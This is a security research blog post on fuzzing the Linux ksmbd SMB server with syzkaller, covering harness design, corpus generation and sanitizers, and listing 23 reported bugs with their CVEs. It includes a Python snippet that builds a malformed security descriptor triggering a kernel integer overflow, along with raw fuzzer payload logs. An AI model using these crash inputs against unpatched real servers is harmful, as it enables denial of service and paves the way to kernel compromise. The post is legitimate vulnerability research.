ksmbd - Fuzzing Improvements and Vulnerability Discovery (2/3)

02 Sep 2025 - Posted by Norbert Szetei

Introduction

This is a follow-up to the article originally published here.

Our initial research uncovered several unauthenticated bugs, but we had only touched the attack surface lightly. Even after patching the code to bypass authentication, most interesting operations required interacting with handlers and state we initially omitted. In this part, we explain how we increased coverage and applied different fuzzing strategies to identify more bugs.

Some functionalities require additional configuration options. We tried to enable many available features to maximize the exposed attack surface. This helped us trigger code paths that are disabled in the minimalistic configuration example. However, to simplify our setup, we did not consider features like Kerberos support or RDMA. These could be targets for further improvement.

Configuration-Dependent Attack Surface

The following functionalities helped expand the attack surface. Only oplocks are enabled by default.

G = Global scope only
S = Per-share, but can also be set globally as a default

durable handles (G)
oplocks (S)
server multi channel support (G)
smb2 leases (G)
vfs objects (S)

From a code perspective, in addition to smb2pdu.c, these source files were involved:

ndr.c – NDR encoding/decoding used in SMB structures
oplock.c – Oplock request and break handling
smbacl.c – Parsing and enforcement of SMB ACLs
vfs.c – Interface to virtual file system operations
vfs_cache.c – Cache layer for file and directory lookups

The remaining files in the fs/smb/server directory were either part of standard communication or exercising them required a more complex setup, as in the case of various authentication schemes.

Fuzzer Improvements

SMB3 expects a valid session setup before most operations, and its authentication flow is multi-step, requiring correct ordering. Implementing valid Kerberos authentication was impractical for fuzzing.

As described in the first part, we patched the NTLMv2 authentication to be able to interact with resources. We also explicitly allowed guest accounts and specified map to guest = bad user to allow a fallback to “guest” when credentials were invalid. After reporting CVE-2024-50285: ksmbd: check outstanding simultaneous SMB operations, credit limitations became more strict, so we patched that out as well to avoid rate limiting.

When we restarted syzkaller with a larger corpus, a few minutes later, all remaining candidates were rejected. After some investigation, we realized it was due to the default max connections = 128, which we had to increase to the maximum value 65536. No other limits were changed.

State Management

SMB interactions are stateful, relying on sessions, TreeIDs, and FileIDs. Fuzzing required simulating valid transitions like smb2_create ⇢ smb2_ioctl ⇢ smb2_close. When we initiated operations such as smb2_tree_connect, smb2_sess_setup, or smb2_create, we manually parsed responses in the pseudo-syscall to extract resource identifiers and reused them in subsequent calls. Our harness was programmed to send multiple messages per pseudo-syscall.

Example code for resources parsing is displayed below:

// process response. does not contain +4B PDU length
void process_buffer(int msg_no, const char *buffer, size_t received) {
  // .. snip ..

    // Extract SMB2 command
  uint16_t cmd_rsp = u16((const uint8_t *)(buffer + CMD_OFFSET));
  debug("Response command: 0x%04x\n", cmd_rsp);

  switch (cmd_rsp) {
    case SMB2_TREE_CONNECT:
      if (received >= TREE_ID_OFFSET + sizeof(uint32_t)) {
        tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET));
        debug("Obtained tree_id: 0x%x\n", tree_id);
      }
      break;

    case SMB2_SESS_SETUP:
      // First session setup response carries session_id
      if (msg_no == 0x01 &&
          received >= SESSION_ID_OFFSET + sizeof(uint64_t)) {
        session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET));
        debug("Obtained session_id: 0x%llx\n", session_id);
      }
      break;

    case SMB2_CREATE:
      if (received >= CREATE_VFID_OFFSET + sizeof(uint64_t)) {
        persistent_file_id = u64((const uint8_t *)(buffer + CREATE_PFID_OFFSET));
        volatile_file_id   = u64((const uint8_t *)(buffer + CREATE_VFID_OFFSET));
        debug("Obtained p_fid: 0x%llx, v_fid: 0x%llx\n",
              persistent_file_id, volatile_file_id);
      }
      break;

    default:
      debug("Unknown command (0x%04x)\n", cmd_rsp);
      break;
  }
}

Another issue we had to solve was that ksmbd relies on global state-memory pools or session tables, which makes fuzzing less deterministic. We tried enabling the experimental reset_acc_state feature to reset accumulated state, but it slowed down fuzzing significantly. We decided to not care much about reproducibility, since each bug typically appeared in dozens or even hundreds of test cases. For the rest, we used focused fuzzing, as described below.

Protocol Specification

We based our harness on the official SMB protocol specification by implementing a grammar for all supported SMB commands. Microsoft publishes detailed technical documents for SMB and other protocols as part of its Open Specifications program.

As an example, the wire format of the SMB2 IOCTL Request is shown below:

We then manually rewrote this specification into our grammar, which allowed our harness to automatically construct valid SMB2 IOCTL requests:

smb2_ioctl_req {
        Header_Prefix           SMB2Header_Prefix
        Command                 const[0xb, int16]
        Header_Suffix           SMB2Header_Suffix
        StructureSize           const[57, int16]
        Reserved                const[0, int16]
        CtlCode                 union_control_codes
        PersistentFileId        const[0x4, int64]
        VolatileFileId          const[0x0, int64]
        InputOffset             offsetof[Input, int32]
        InputCount              bytesize[Input, int32]
        MaxInputResponse        const[65536, int32]
        OutputOffset            offsetof[Output, int32]
        OutputCount             len[Output, int32]
        MaxOutputResponse       const[65536, int32]
        Flags                   int32[0:1]
        Reserved2               const[0, int32]
        Input                   array[int8]
        Output                  array[int8]
} [packed]

We did a final check against the source code to identify and verify possible mismatches during our translation.

Fuzzing Strategies

Since we were curious about the bugs that might be missed when using only the default syzkaller configuration with a corpus generated from scratch, we explored different fuzzing approaches, each of which is described in the following subsections.

FocusAreas

Occasionally, we triggered a bug that we were not able to reproduce, and it was not immediately clear from the crash log why it occurred. In other cases, we wanted to focus on a parsing function that had weak coverage. The experimental function focus_areas allows exactly that.

For instance, by targeting smb_check_perm_dacl with

"focus_areas": [
  {"filter": {"functions": ["smb_check_perm_dacl"]}, "weight": 20.0},
  {"filter": {"files": ["^fs/smb/server/"]}, "weight": 2.0},
  {"weight": 1.0}
]

we identified multiple integer overflows and were able to quickly suggest and confirm the patch.

To reach the vulnerable code, syzkaller constructed an ACL that passed validation and led to an integer overflow. After rewriting it in Python, it looked like this:

def build_sd():
    sd = bytearray(0x14)

    sd[0x00] = 0x00
    sd[0x01] = 0x00
    struct.pack_into("<H", sd, 0x02, 0x0001)
    struct.pack_into("<I", sd, 0x04, 0x78)
    struct.pack_into("<I", sd, 0x08, 0x00)
    struct.pack_into("<I", sd, 0x0C, 0x10000)
    struct.pack_into("<I", sd, 0x10, 0xFFFFFFFF) # dacloffset

    while len(sd) < 0x78:
        sd += b"A"

    sd += b"\x01\x01\x00\x00\x00\x00\x00\x00"
    sd += b"\xCC" * 64

    return bytes(sd)

sd = build_sd()
print(f"[+] Final SD length: {len(sd)}")

ANYBLOB

The anyTypes struct is used internally during fuzzing and it is less documented - probably because it’s not intended to be used directly. It is defined in prog/any.go and can represent multiple structures::

type anyTypes struct {
	union  *UnionType
	array  *ArrayType
	blob   *BufferType
    // .. snip..
}

Implemented in commit 9fe8aa4, the use case is to squash complex structures into a flat byte array, and apply just generic mutations.

Reading the test case is more illustrative to see how it works, where:

foo$any_in(&(0x7f0000000000)={0x11, 0x11223344, 0x2233, 0x1122334455667788, {0x1, 0x7, 0x1, 0x1, 0x1bc, 0x4}, [{@res32=0x0, @i8=0x44, "aabb"}, {@res64=0x1, @i32=0x11223344, "1122334455667788"}, {@res8=0x2, @i8=0x55, "cc"}]})

translates to

foo$any_in(&(0x7f0000000000)=ANY=[@ANYBLOB="1100000044332211223300000000000088776655443322117d00bc11", @ANYRES32=0x0, @ANYBLOB="0000000044aabb00", @ANYRES64=0x1, @ANYBLOB="443322111122334455667788", @ANYRES8=0x2, @ANYBLOB="0000000000000055cc0000"])`

The translation happens automatically as part of the fuzzing process. After running the fuzzer for several weeks, it stopped producing new coverage. Instead of manually writing inputs that followed the grammar and reached new paths, we used ANYBLOB, which allowed us to generate them easily.

The ANYBLOB is represented as a BufferType data type and we used public pcaps obtained here and here to generate a new corpus.

import json
import os

# tshark -r smb2_dac_sample.pcap -Y "smb || smb2" -T json -e tcp.payload > packets.json

os.makedirs("corpus", exist_ok=True)

def load_packets(json_file):
    with open(json_file, 'r') as file:
        data = json.load(file)
    
    packets = [entry["_source"]["layers"]["tcp.payload"] for entry in data]
    
    return packets

if __name__ == "__main__":
    json_file = "packets.json"
    packets = load_packets(json_file)
    
    for i, packet in enumerate(packets):
        pdu_size = len(packet[0])
        filename = f"corpus/packet_{i:03d}.txt"
        with open(filename, "w") as f:
            f.write(f"syz_ksmbd_send_req(&(0x7f0000000340)=ANY=[@ANYBLOB=\"{packet[0]}\"], {hex(pdu_size)}, 0x0, 0x0)")

After that, we used syz-db to pack all candidates into the corpus database and resumed fuzzing.

With that, we were able to immediately trigger ksmbd: fix use-after-free in ksmbd_sessions_deregister() and improve overall coverage by a few percent.

Sanitizer Coverage Beyond KASAN

In addition to KASAN, we tried other sanitizers such as KUBSAN and KCSAN. There was no significant improvement: KCSAN produced many false positives or reported bugs in unrelated components with seemingly no security impact. Interestingly, KUBSAN was able to identify one additional issue that KASAN did not detect:

id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);

In this case, the user was able to set psid->num_subauth to 0, which resulted in an incorrect read psid->sub_auth[-1]. Although this access still fell within the same struct allocation (smb_sid), UBSAN’s array index bounds check considered the declared bounds of the array

struct smb_sid {
	__u8 revision; /* revision level */
	__u8 num_subauth;
	__u8 authority[NUM_AUTHS];
	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
} __attribute__((packed));

and was therefore able to catch the bug.

Coverage

One unresolved issue was fuzzing with multiple processes. Due to various locking mechanisms, and because we reused the same authentication state, we noticed that fuzzing was more stable and coverage increased faster when using only one process. We sent multiple requests within a single invocation, but initially worried that this would cause us to miss race conditions.

If we check the execution log, we see that syzkaller creates multiple threads inside one process, the same way it does when calling standard syscalls:

1.887619984s ago: executing program 0 (id=1628):
syz_ksmbd_send_req(&(0x7f0000000d40)={0xee, @smb2_read_req={{}, 0x8, {0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, "fbac8eef056a860726ca964fb4f60999"}, 0x31, 0x6, 0x2, 0x7e, 0x70, 0x4, 0x0, 0xffffffff, 0x2, 0x7, 0xee, 0x0, "1cad48fb0cba2f253915fe074290eb3e10ed9ac895dde2a575e4caabc1f3a537e265fea8a440acfd66cf5e249b1ccaae941160f24282c81c9df0260d0403bb44b0461da80509bd756c155b191718caa5eabd4bd89aa9bed58bf87d42ef49bca4c9f08f22d495b601c9c025631b815bf6cbeb0aa4785aec4abf776d75e5be"}}, 0xf2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
syz_ksmbd_send_req(&(0x7f0000000900)=ANY=[@ANYRES16=<r0=>0x0], 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
syz_ksmbd_send_req(&(0x7f0000001440)=ANY=[@ANYBLOB="000008c0fe534d4240000000000000000b0001000000000000000000030000000000000000000000010000000100000000000000684155244ffb955e3201e88679ed735a39000000040214000400000000000000000000000000000078000000480800000000010000000000000000000000010001"], 0x8c4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
syz_ksmbd_send_req(&(0x7f0000000200)={0x58, @smb2_oplock_break_req={{}, 0x12, {0x1, 0x0, 0x0, 0x9, 0x0, 0x1, 0x1, "3c66dd1fe856ec397e7f8d7c8c293fd6"}, 0x24}}, 0x5c, &(0x7f0000000000)=ANY=[@ANYBLOB="00000080fe534d424000010000000000050001000800000000000000040000000000000000000000010000000100000000000000b31fae29f7ea148ad156304f457214a539000000020000000000000000000000000000000000000000000002"], 0x84, &(0x7f0000000100)=ANY=[@ANYBLOB="00000062fe534d4240000000000000000e00010000000000000000000700000000000000000000000100000001000000000000000002000000ffff0000000000000000002100030a08000000040000000000000000000000000000006000020009000000aedf"], 0x66, 0x0, 0x0) (async)
...

Observe the async keyword automatically added during the fuzzing process, which allows running commands in parallel without blocking, implemented in this commit fd8caa5. Hence, no UAF was missed due to the seemingly absent parallelism.

In the end, based on syzkaller’s benchmark, we executed 20-30 processes per second in 20 VMs, which still potentially meant running several hundred commands. For reference, we used a server with an average configuration - nothing particularly optimized for fuzzing performance.

We measured coverage using syzkaller’s built-in function-level metrics. While we’re aware that this does not capture state transitions, which are critical in a protocol like SMB, it still provides a useful approximation of code exercised. Overall, the fs/smb/server directory reached around 60%. For smb2pdu.c specifically, which handles most SMB command parsing and dispatch, we reached 70%.

The screenshot below shows coverage across key files.

Discovered Bugs

During our research period, we reported a grand total of 23 bugs. The majority of the bugs are use-after-frees or out-of-bounds read or write findings. Given this quantity, it is natural that the impact differs. For instance, fix the warning from __kernel_write_iter is a simple warning that could only be used for DoS in a specific setup (kernel.panic_on_warn), validate zero num_subauth before sub_auth is accessed is a simple out-of-bounds 1-byte read, and prevent rename with empty string will only cause a kernel oops.

There are additional issues where exploitability requires more thoughtful analysis (e.g., fix type confusion via race condition when using ipc_msg_send_request). Nevertheless, after evaluating potentially promising candidates, we were able to identify some powerful primitives, allowing an attacker to exploit the finding at least locally to gain remote code execution.

The list of the issues identified is reported hereby:

Description	Commit	CVE
prevent out-of-bounds stream writes by validating *pos	0ca6df4	CVE-2025-37947
prevent rename with empty string	53e3e5b	CVE-2025-37956
fix use-after-free in ksmbd_session_rpc_open	a1f46c9	CVE-2025-37926
fix the warning from __kernel_write_iter	b37f2f3	CVE-2025-37775
fix use-after-free in smb_break_all_levII_oplock()	18b4fac	CVE-2025-37776
fix use-after-free in __smb2_lease_break_noti()	21a4e47	CVE-2025-37777
validate zero num_subauth before sub_auth is accessed	bf21e29	CVE-2025-22038
fix overflow in dacloffset bounds check	beff0bc	CVE-2025-22039
fix use-after-free in ksmbd_sessions_deregister()	15a9605	CVE-2025-22041
fix r_count dec/increment mismatch	ddb7ea3	CVE-2025-22074
add bounds check for create lease context	bab703e	CVE-2025-22042
add bounds check for durable handle context	542027e	CVE-2025-22043
prevent connection release during oplock break notification	3aa660c	CVE-2025-21955
fix use-after-free in ksmbd_free_work_struct	bb39ed4	CVE-2025-21967
fix use-after-free in smb2_lock	84d2d16	CVE-2025-21945
fix bug on trap in smb2_lock	e26e2d2	CVE-2025-21944
fix out-of-bounds in parse_sec_desc()	d6e13e1	CVE-2025-21946
fix type confusion via race condition when using ipc_msg_send_req..	e2ff19f	CVE-2025-21947
align aux_payload_buf to avoid OOB reads in cryptographic operati..	06a0254	-
check outstanding simultaneous SMB operations	0a77d94	CVE-2024-50285
fix slab-use-after-free in smb3_preauth_hash_rsp	b8fc56f	CVE-2024-50283
fix slab-use-after-free in ksmbd_smb2_session_create	c119f4e	CVE-2024-50286
fix slab-out-of-bounds in smb2_allocate_rsp_buf	0a77715	CVE-2024-26980

Note that we are aware of the controversy around CVE assignment since the Linux kernel became a CVE Numbering Authority (CNA) in February 2024. My personal take is that, while there were many disputable cases, the current approach is pragmatic: CVEs are now assigned for fixes with potential security impact, particularly memory corruptions and other classes of bugs that could potentially be exploitable.

For more information, the whole process is described in detail in this great presentation, or the relevant article. Lastly, the voting process for CVE approval is implemented in the vulns.git repository.

Conclusion

Our research yielded a few dozen bugs, although using pseudo-syscalls is generally discouraged and comes with several disadvantages. For instance, in all cases, we had to perform the triaging process manually by finding the relevant crash log entries, generating C programs, and minimizing them by hand.

Since syscalls can be tied using resources, this method could also be applied to ksmbd, which involves sending packets. It would be ideal for future research to explore this direction - SMB commands could yield resources that are then fed into different commands. Due to time restrictions, we followed the pseudo-syscall approach, relying on custom patches.

For the next and last part, we focus on exploiting CVE-2025-37947.

ABOUT US

Blog Archive

ksmbd - Fuzzing Improvements and Vulnerability Discovery (2/3)

Introduction

Configuration-Dependent Attack Surface

Fuzzer Improvements

State Management

Protocol Specification

Fuzzing Strategies

FocusAreas

ANYBLOB

Sanitizer Coverage Beyond KASAN

Coverage

Discovered Bugs

Conclusion

References

ABOUT US

Blog Archive

ksmbd - Fuzzing Improvements and Vulnerability Discovery (2/3)

Introduction

Configuration-Dependent Attack Surface

Fuzzer Improvements

State Management

Protocol Specification

Fuzzing Strategies

FocusAreas

ANYBLOB

Sanitizer Coverage Beyond KASAN

Coverage

Discovered Bugs

Conclusion

References

Other relevant posts:

ksmbd - Exploiting CVE-2025-37947 (3/3) 08 Oct 2025

!exploitable Episode Two - Enter the Matrix 27 Feb 2025

ksmbd vulnerability research 07 Jan 2025

Introduction to VirtualBox security research 26 Apr 2022

Fuzzing JavaScript Engines with Fuzzilli 09 Sep 2020

Fuzzing TLS certificates from their ASN.1 grammar 14 May 2020

Staring into the Spotlight 15 Nov 2017